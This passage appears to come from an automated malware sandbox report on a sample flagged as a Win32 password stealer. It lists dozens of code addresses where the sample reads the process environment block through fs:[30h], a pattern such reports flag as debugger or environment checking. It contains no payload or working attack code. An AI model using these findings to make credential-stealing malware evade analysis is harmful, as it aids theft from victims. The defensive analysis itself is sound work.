          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B4015 mov eax, dword ptr fs:[00000030h]10_2_018B4015
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E40E1 mov eax, dword ptr fs:[00000030h]10_2_017E40E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E40E1 mov eax, dword ptr fs:[00000030h]10_2_017E40E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E40E1 mov eax, dword ptr fs:[00000030h]10_2_017E40E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01814020 mov edi, dword ptr fs:[00000030h]10_2_01814020
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181002D mov eax, dword ptr fs:[00000030h]10_2_0181002D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181002D mov eax, dword ptr fs:[00000030h]10_2_0181002D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181002D mov eax, dword ptr fs:[00000030h]10_2_0181002D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181002D mov eax, dword ptr fs:[00000030h]10_2_0181002D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181002D mov eax, dword ptr fs:[00000030h]10_2_0181002D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A830 mov eax, dword ptr fs:[00000030h]10_2_0180A830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A830 mov eax, dword ptr fs:[00000030h]10_2_0180A830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A830 mov eax, dword ptr fs:[00000030h]10_2_0180A830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A830 mov eax, dword ptr fs:[00000030h]10_2_0180A830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E70C0 mov eax, dword ptr fs:[00000030h]10_2_017E70C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E70C0 mov eax, dword ptr fs:[00000030h]10_2_017E70C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1843 mov eax, dword ptr fs:[00000030h]10_2_018A1843
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01800050 mov eax, dword ptr fs:[00000030h]10_2_01800050
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01800050 mov eax, dword ptr fs:[00000030h]10_2_01800050
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F28AE mov eax, dword ptr fs:[00000030h]10_2_017F28AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F28AE mov eax, dword ptr fs:[00000030h]10_2_017F28AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F28AE mov eax, dword ptr fs:[00000030h]10_2_017F28AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F28AE mov ecx, dword ptr fs:[00000030h]10_2_017F28AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F28AE mov eax, dword ptr fs:[00000030h]10_2_017F28AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F28AE mov eax, dword ptr fs:[00000030h]10_2_017F28AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180F86D mov eax, dword ptr fs:[00000030h]10_2_0180F86D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A2073 mov eax, dword ptr fs:[00000030h]10_2_018A2073
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E9080 mov eax, dword ptr fs:[00000030h]10_2_017E9080
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E3880 mov eax, dword ptr fs:[00000030h]10_2_017E3880
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E3880 mov eax, dword ptr fs:[00000030h]10_2_017E3880
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B1074 mov eax, dword ptr fs:[00000030h]10_2_018B1074
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A138A mov eax, dword ptr fs:[00000030h]10_2_018A138A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0188EB8A mov ecx, dword ptr fs:[00000030h]10_2_0188EB8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0188EB8A mov eax, dword ptr fs:[00000030h]10_2_0188EB8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0188EB8A mov eax, dword ptr fs:[00000030h]10_2_0188EB8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0188EB8A mov eax, dword ptr fs:[00000030h]10_2_0188EB8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0189D380 mov ecx, dword ptr fs:[00000030h]10_2_0189D380
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181138B mov eax, dword ptr fs:[00000030h]10_2_0181138B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181138B mov eax, dword ptr fs:[00000030h]10_2_0181138B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181138B mov eax, dword ptr fs:[00000030h]10_2_0181138B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FF370 mov eax, dword ptr fs:[00000030h]10_2_017FF370
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FF370 mov eax, dword ptr fs:[00000030h]10_2_017FF370
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FF370 mov eax, dword ptr fs:[00000030h]10_2_017FF370
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181B390 mov eax, dword ptr fs:[00000030h]10_2_0181B390
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01812397 mov eax, dword ptr fs:[00000030h]10_2_01812397
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180EB9A mov eax, dword ptr fs:[00000030h]10_2_0180EB9A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180EB9A mov eax, dword ptr fs:[00000030h]10_2_0180EB9A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017EDB60 mov ecx, dword ptr fs:[00000030h]10_2_017EDB60
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1BA8 mov eax, dword ptr fs:[00000030h]10_2_018A1BA8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017EF358 mov eax, dword ptr fs:[00000030h]10_2_017EF358
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01814BAD mov eax, dword ptr fs:[00000030h]10_2_01814BAD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01814BAD mov eax, dword ptr fs:[00000030h]10_2_01814BAD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01814BAD mov eax, dword ptr fs:[00000030h]10_2_01814BAD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B5BA5 mov eax, dword ptr fs:[00000030h]10_2_018B5BA5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B9BBE mov eax, dword ptr fs:[00000030h]10_2_018B9BBE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B8BB6 mov eax, dword ptr fs:[00000030h]10_2_018B8BB6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017EDB40 mov eax, dword ptr fs:[00000030h]10_2_017EDB40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018153C5 mov eax, dword ptr fs:[00000030h]10_2_018153C5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018653CA mov eax, dword ptr fs:[00000030h]10_2_018653CA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018653CA mov eax, dword ptr fs:[00000030h]10_2_018653CA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018103E2 mov eax, dword ptr fs:[00000030h]10_2_018103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018103E2 mov eax, dword ptr fs:[00000030h]10_2_018103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018103E2 mov eax, dword ptr fs:[00000030h]10_2_018103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018103E2 mov eax, dword ptr fs:[00000030h]10_2_018103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018103E2 mov eax, dword ptr fs:[00000030h]10_2_018103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018103E2 mov eax, dword ptr fs:[00000030h]10_2_018103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180DBE9 mov eax, dword ptr fs:[00000030h]10_2_0180DBE9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018923E3 mov ecx, dword ptr fs:[00000030h]10_2_018923E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018923E3 mov ecx, dword ptr fs:[00000030h]10_2_018923E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018923E3 mov eax, dword ptr fs:[00000030h]10_2_018923E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A309 mov eax, dword ptr fs:[00000030h]10_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A131B mov eax, dword ptr fs:[00000030h]10_2_018A131B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E1BE9 mov eax, dword ptr fs:[00000030h]10_2_017E1BE9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B8B58 mov eax, dword ptr fs:[00000030h]10_2_018B8B58
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01813B5A mov eax, dword ptr fs:[00000030h]10_2_01813B5A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01813B5A mov eax, dword ptr fs:[00000030h]10_2_01813B5A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01813B5A mov eax, dword ptr fs:[00000030h]10_2_01813B5A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01813B5A mov eax, dword ptr fs:[00000030h]10_2_01813B5A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01876365 mov eax, dword ptr fs:[00000030h]10_2_01876365
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01876365 mov eax, dword ptr fs:[00000030h]10_2_01876365
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01876365 mov eax, dword ptr fs:[00000030h]10_2_01876365
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E4B94 mov edi, dword ptr fs:[00000030h]10_2_017E4B94
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F1B8F mov eax, dword ptr fs:[00000030h]10_2_017F1B8F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F1B8F mov eax, dword ptr fs:[00000030h]10_2_017F1B8F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01813B7A mov eax, dword ptr fs:[00000030h]10_2_01813B7A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01813B7A mov eax, dword ptr fs:[00000030h]10_2_01813B7A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181DA88 mov eax, dword ptr fs:[00000030h]10_2_0181DA88
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181DA88 mov eax, dword ptr fs:[00000030h]10_2_0181DA88
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A129A mov eax, dword ptr fs:[00000030h]10_2_018A129A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181D294 mov eax, dword ptr fs:[00000030h]10_2_0181D294
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181D294 mov eax, dword ptr fs:[00000030h]10_2_0181D294
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01815AA0 mov eax, dword ptr fs:[00000030h]10_2_01815AA0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01815AA0 mov eax, dword ptr fs:[00000030h]10_2_01815AA0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181FAB0 mov eax, dword ptr fs:[00000030h]10_2_0181FAB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018112BD mov esi, dword ptr fs:[00000030h]10_2_018112BD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018112BD mov eax, dword ptr fs:[00000030h]10_2_018112BD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018112BD mov eax, dword ptr fs:[00000030h]10_2_018112BD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E9240 mov eax, dword ptr fs:[00000030h]10_2_017E9240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E9240 mov eax, dword ptr fs:[00000030h]10_2_017E9240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E9240 mov eax, dword ptr fs:[00000030h]10_2_017E9240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E9240 mov eax, dword ptr fs:[00000030h]10_2_017E9240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E8239 mov eax, dword ptr fs:[00000030h]10_2_017E8239
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E8239 mov eax, dword ptr fs:[00000030h]10_2_017E8239
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E8239 mov eax, dword ptr fs:[00000030h]10_2_017E8239
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01812ACB mov eax, dword ptr fs:[00000030h]10_2_01812ACB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B8ADD mov eax, dword ptr fs:[00000030h]10_2_018B8ADD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E4A20 mov eax, dword ptr fs:[00000030h]10_2_017E4A20
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E4A20 mov eax, dword ptr fs:[00000030h]10_2_017E4A20
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01812AE4 mov eax, dword ptr fs:[00000030h]10_2_01812AE4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF mov eax, dword ptr fs:[00000030h]10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017EAA16 mov eax, dword ptr fs:[00000030h]10_2_017EAA16
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017EAA16 mov eax, dword ptr fs:[00000030h]10_2_017EAA16
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E5210 mov eax, dword ptr fs:[00000030h]10_2_017E5210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E5210 mov ecx, dword ptr fs:[00000030h]10_2_017E5210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E5210 mov eax, dword ptr fs:[00000030h]10_2_017E5210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E5210 mov eax, dword ptr fs:[00000030h]10_2_017E5210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F8A0A mov eax, dword ptr fs:[00000030h]10_2_017F8A0A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01803A1C mov eax, dword ptr fs:[00000030h]10_2_01803A1C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018AAA16 mov eax, dword ptr fs:[00000030h]10_2_018AAA16
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018AAA16 mov eax, dword ptr fs:[00000030h]10_2_018AAA16
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1229 mov eax, dword ptr fs:[00000030h]10_2_018A1229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A229 mov eax, dword ptr fs:[00000030h]10_2_0180A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A229 mov eax, dword ptr fs:[00000030h]10_2_0180A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A229 mov eax, dword ptr fs:[00000030h]10_2_0180A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A229 mov eax, dword ptr fs:[00000030h]10_2_0180A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A229 mov eax, dword ptr fs:[00000030h]10_2_0180A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A229 mov eax, dword ptr fs:[00000030h]10_2_0180A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A229 mov eax, dword ptr fs:[00000030h]10_2_0180A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A229 mov eax, dword ptr fs:[00000030h]10_2_0180A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A229 mov eax, dword ptr fs:[00000030h]10_2_0180A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E12D4 mov eax, dword ptr fs:[00000030h]10_2_017E12D4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01824A2C mov eax, dword ptr fs:[00000030h]10_2_01824A2C
